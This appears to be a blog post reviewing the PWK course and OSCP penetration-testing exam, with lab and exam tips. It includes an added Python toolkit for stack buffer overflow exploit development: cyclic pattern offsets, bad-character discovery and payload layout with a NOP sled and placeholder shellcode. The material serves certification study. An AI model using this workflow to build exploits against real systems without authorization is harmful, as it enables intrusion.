There is an overwhelming amount of information available to anyone considering or attempting the Offensive Security Certified Professional (OSCP) exam, yet it is still one of the most common questions we get from readers and Twitter followers. Given the continued interest, here are my two cents on the Penetration Testing with Kali (PWK) course and the OSCP exam that follows it. I’ll try to keep this as brief and as informative as possible.
I am a lifelong autodidact with a deep interest in all things digital, especially the manipulation of remote systems and information. Military experience aside, my professional roles have included web/API development in both PHP and Python, vulnerability research (binary exploitation), C development (device communication), and my current work as a full-time Red Teamer. OSCP is my first certification despite working in the industry for 5+ years.
Note: You can absolutely break into the industry without any certifications, but given the opportunity, the right certificate can advance your career or help move you into a more appropriate position for your skill level or interest.
The Penetration Testing with Kali course comes with a complete set of instructional videos along with a lab manual for navigating the virtual penetration testing lab. Courses start weekly, but you may have to wait a few weeks for an opening slot based on current demand. The course material is not available until the start date, so if you are looking for some good preparation material, see the resources section below.
The PWK course and OSCP exam are not cheap; the package starts at $800 US for 30 days of lab access, and lab extensions are available once your initial period has expired. I opted for the 60 day option, which was ample time to complete 90%+ of the lab machines. The pricing is well documented but subject to change; for a full list of options, check out the OSCP Pricing Page.
The lab is where the course really shines. There are enough targets (~40-50) to introduce even the most novice of students to a large number of common services and misconfigurations. You will be required to conduct reconnaissance, enumeration, exploitation, and post-exploitation on an assortment of server- and client-based systems.
The lab manual is there for a reason, and covers many topics that are not included in the video resources. I highly recommend that you take the time to go through the lab book prior to launching all the things inside the lab.
PWK comes with a custom version of Kali for use in the lab and on the exam. Despite the temptation to have bleeding edge tools, resist the urge to update your system. Leaving a system unpatched is generally bad practice and leaves known vulnerabilities exposed, but for the duration of the course only, I’d recommend not updating Kali: updated packages can surface arcane bugs against the course material. I did opt to use the latest versions of specific tools, namely nikto and nmap.
Get used to not using Metasploit in the lab. You are only allowed to use it on one machine during the exam. By all means, get familiar with Metasploit and Meterpreter features, but ensure that you don’t end up relying on tools for exploitation. Find public exploits and modify them for your use. Learn to port exploits to the language of your choice. You will learn much more by getting intricately familiar with WHY a vulnerability exists and HOW it actually works.
Use the forums. Don’t use the forums until you get stuck. The forums are a great resource, especially for some of the more CTF style targets. CTFs are notorious for forcing you to follow the challenge writer’s logic in solving challenges as opposed to enforcing sound enumeration techniques. Don’t be afraid to use the forums, the mods are great at killing any spoilers, but that vague comment may just be what you need to pop a remote shell.
Take time while you’re in the lab to improve on your programming skills. You will learn some bash scripting and basic Python in the course. The more that you are able to automate and understand in a language, the better off you will be. You will learn how to exploit stack based buffer overflows. Learn this process front and back from identification of a buffer overflow vector to code execution. You don’t need to be fancy with exploit mitigation bypasses, but you will need to write at least one custom exploit for the exam. If you are intimately familiar with the process, this will be the easiest 25 points on the exam.
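The offset and bad-character steps of the stack overflow process described above, as an added Python example that is not from the PWK course or the original post. It assumes a 32-bit x86 target with no exploit mitigations; the EIP value (39654138), return address (0x625011af), shellcode stand-in and the "target" that strips CR/LF are all constructed for illustration, and in practice those values come from your debugger and your own shellcode.

```python
"""
Stack overflow exploit-development helpers (added example, not part of the
PWK course material). Reproduces the offset and bad-character steps of the
classic 32-bit stack overflow workflow in plain Python so the mechanics can
be checked without a debugger attached: cyclic pattern, EIP offset, iterative
bad-character discovery, and final payload layout. The target behaviour and
addresses used below are constructed for illustration.
"""
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern Aa0Aa1...Zz9 (unique 3-byte triplets, max 20280 bytes)."""
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern length exceeds 20280 bytes")


def pattern_offset(eip_value, length=5000):
    """Offset at which the 4 bytes that overwrote EIP sit in the pattern.

    eip_value is the register value from the debugger, as an int or a hex
    string such as '39654138'. x86 is little-endian, so the register holds
    the 4 pattern bytes reversed; pack it back before searching.
    """
    if isinstance(eip_value, str):
        eip_value = int(eip_value, 16)
    needle = struct.pack("<I", eip_value)
    idx = pattern_create(length).find(needle)
    if idx == -1:
        raise ValueError("EIP value not in pattern: not a clean overwrite, or pattern too short")
    return idx


def badchar_probe(excluded=(0x00,)):
    """Every byte 0x01..0xff except those already known to be bad (0x00 is assumed bad)."""
    return bytes(b for b in range(1, 256) if b not in excluded)


def first_badchar(sent, dumped):
    """First byte of the probe that was mangled or truncated in the memory dump.

    Only the first mismatch is trustworthy: once a bad byte is dropped or
    replaced, everything after it is shifted, so the method is iterative.
    Returns None when the dump matches the probe exactly.
    """
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def find_badchars(dump_fn, known=(0x00,)):
    """Iteratively exclude bad bytes until the dump matches the probe.

    dump_fn stands in for 'send the probe, read the bytes back from the
    stack in the debugger'; pass any callable with that behaviour.
    """
    bad = list(known)
    while True:
        probe = badchar_probe(bad)
        b = first_badchar(probe, dump_fn(probe))
        if b is None:
            return sorted(bad)
        bad.append(b)


def build_payload(offset, ret_addr, shellcode, badchars, nop_sled=16):
    """junk | return address (little-endian) | NOP sled | shellcode.

    Refuses to build if the return address, sled, or shellcode contains a
    bad byte; that is the most common reason a 'working' exploit fails
    after the offset step.
    """
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + shellcode
    hit = set(payload[offset:]) & set(badchars)
    if hit:
        raise ValueError("payload contains bad chars: " + ", ".join(f"{b:#04x}" for b in sorted(hit)))
    return payload


def fake_target_dump(data):
    """Constructed stand-in for a vulnerable service that strips CR/LF (0x0d, 0x0a)."""
    return bytes(b for b in data if b not in (0x0a, 0x0d))


if __name__ == "__main__":
    # Debugger showed EIP = 39654138 after sending a 5000-byte pattern (constructed value).
    offset = pattern_offset("39654138")
    bad = find_badchars(fake_target_dump)
    payload = build_payload(offset, 0x625011af, b"\xcc" * 4, bad)  # address/shellcode constructed
    print(f"offset={offset} badchars={[hex(b) for b in bad]} payload_len={len(payload)}")
```

The iterative bad-character pass is the step most people shortcut. A single dropped byte in the return address or shellcode fails silently at runtime, so build_payload refuses to assemble such a payload rather than letting it go out; re-running find_badchars after each exclusion is what makes the result trustworthy.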
Work on your weaknesses. Take full advantage of your lab time. If you are primarily used to targeting Windows, then focus on the Linux machines. If you are weak on Windows privilege escalation, then you have plenty of opportunity to test various methods on the Windows machines. Always start with misconfigurations before launching random exploits. Launching the wrong binary may result in an unresponsive or unstable machine.
Take outstanding notes. Documentation is the bane of every Red Teamer’s and Penetration Tester’s existence, but it is absolutely critical. Use the lab to develop a note taking methodology that works for you. I highly recommend a tool called Typora. It is a Markdown editor and viewer that just works and includes in-line images, charts, highlighting, and much more. The in-line image handling is perfect for presenting screenshots throughout all phases of testing on both the lab and on the exam. By taking proper notes, your report will practically be done before you start writing it.
Yes, we all know that the constant mantra of OSCP graduates and students alike is Try Harder. I’m here to tell you that you need to Try Easier, at least initially. OSCP is very much an entry level (albeit hands on) certification. Find a new service? Try the default passwords, try anonymous access and guest accounts. Attempt simple escape sequences and look for errors or anomalies. Only after you have tested the common-sense and the ridiculous should you move on to the Try Harder phase.
The key to success is realizing the information that you possess and how it can be used to get you one step closer to the target. You will be chaining a lot of small vulnerabilities together resulting in full system compromise.
The exam is in-depth and hands-on. You will be asked to apply all of the skills that you gained through the videos, lab manual, exercises, and lab machines in a 24 hour penetration test simulation. Upon completion of the hands-on portion, you will be given an additional 24 hours to write a full penetration testing report. You will be given 5 specific targets with varying point values. The maximum score on the exam is 100, and you must receive at least 70/100 to pass.
Make sure you take the required screenshots and submit the proof files accordingly!!!
Extra credit is available, and requires that you also submit a Penetration Testing report for the lab. The report must include the details of at least 10 fully compromised and unique lab machines. You must also submit proof of work for all lab book exercises. I highly recommend doing the extra credit, the hands on time of report writing and finishing the exercises will only reinforce the fundamentals presented throughout the course.
Remember that while you have the additional 24 hours for report writing, you will NOT have access to the exam network after the exam time expires. If you missed some screenshots or forgot to submit proof through the web interface, you are out of luck. You can pay an extra $60 to take the exam again in a week (or longer if you want more lab time).
- Don’t quit
- Try easier
- Then try harder
- Document everything as you go
- Take a step back and assess what you have and where you are going
- Take breaks
Videos and Training
- Hacking: The Art of Exploitation
- The Hacker Playbook 2
- Black Hat Python
- Red Team Field Manual
- Penetration Testing: A Hands-On Introduction to Hacking
- OSCP Total Guide
- Basic Linux Privilege Escalation
- Windows Privilege Escalation
- Linux Privilege Escalation Scripts
- TTY Shell Upgrades
- Reverse Shell Cheatsheet